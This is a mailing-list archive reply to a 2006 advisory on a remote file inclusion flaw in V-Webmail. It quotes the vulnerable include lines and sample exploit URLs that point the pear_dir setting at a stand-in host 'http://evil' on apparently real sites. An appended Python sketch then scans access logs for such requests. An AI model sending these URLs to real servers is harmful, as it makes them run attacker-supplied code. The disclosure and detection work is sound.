Open Source and information security mailing list archives
Date: Tue, 30 May 2006 11:39:04 +0300
From: "Ventsislav Genchev" <vigour1@...il.com>
To: bugs@...uritytracker.com, bugtraq@...urityfocus.com, submit@...w0rm.com
Subject: Re: V-Webmail 1.6.4 Remote File Include

Tested with register_globals = Off ... no effect.

Regards,
Ventsi

On 5/25/06, beford <xbefordx@...il.com> wrote:
> Script: V-Webmail 1.6.4
> Vendor: http://www.v-webmail.org/
> Description: V-webmail is a powerful PHP based webmail application with an
> abundance of features, including many innovative ideas for web applications
> Discovered: beford <xbefordx gmail com>
> Vulnerable File
>
> v-webmail/includes/pear/*/*.php => require_once ($CONFIG['pear_dir'] . '*.php');
> v-webmail/includes/mailaccess/pop3.php =>
> require_once($CONFIG['pear_dir'] . 'Net/POP3.php');
>
> Version 1.3
> http://www.site.th/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil
> http://www.woot.com.kh/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil
>
> Version 1.5 - 1.6.4
> http://something.ie/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://evil
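
A detection sketch for the request pattern in the quoted advisory, added here as an example and not part of either message: it scans web access log lines for a query parameter that sets an element of `CONFIG` to a remote URL. The log lines, hosts and the names `find_global_override` and `scan` are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Prefixes that PHP's include/require can resolve through stream wrappers.
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:")

# Request field of a Common/Combined Log Format line: "METHOD target PROTOCOL".
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def find_global_override(log_line, var_names=("CONFIG",)):
    """Return (path, param, value) for each query parameter that sets an
    element of a watched variable (e.g. CONFIG[pear_dir]) to a remote URL."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    path, _, query = match.group(1).partition("?")
    hits = []
    # parse_qsl percent-decodes names and values, so CONFIG%5Bpear_dir%5D
    # and http%3A%2F%2F... are matched as well as the literal forms.
    for name, value in parse_qsl(query, keep_blank_values=True):
        base = name.split("[", 1)[0]
        if base in var_names and value.strip().lower().startswith(REMOTE_PREFIXES):
            hits.append((path, name, value))
    return hits

# Constructed sample lines (documentation IPs, reserved .example hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/May/2006:11:00:01 +0300] "GET /v-webmail/index.php?folder=INBOX HTTP/1.1" 200 5120',
    '192.0.2.44 - - [30/May/2006:11:02:17 +0300] "GET /v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://host.example/ HTTP/1.1" 200 0',
    '192.0.2.44 - - [30/May/2006:11:02:19 +0300] "GET /v-webmail/includes/mailaccess/pop3.php?CONFIG%5Bpear_dir%5D=HTTP%3A%2F%2Fhost.example%2F HTTP/1.0" 500 0',
    '192.0.2.10 - - [30/May/2006:11:05:40 +0300] "GET /v-webmail/prefs.php?CONFIG[lang]=en HTTP/1.1" 200 812',
]

def scan(lines):
    """Collect hits across many log lines, keeping the 1-based line number."""
    return [(n, hit) for n, line in enumerate(lines, 1)
            for hit in find_global_override(line)]

if __name__ == "__main__":
    for line_no, (path, name, value) in scan(SAMPLE_LOG):
        print(f"line {line_no}: {path} sets {name} -> {value}")
```

Access logs show only the query string; with register_globals = On the same variable can also arrive in a POST body or a cookie, which this check does not see.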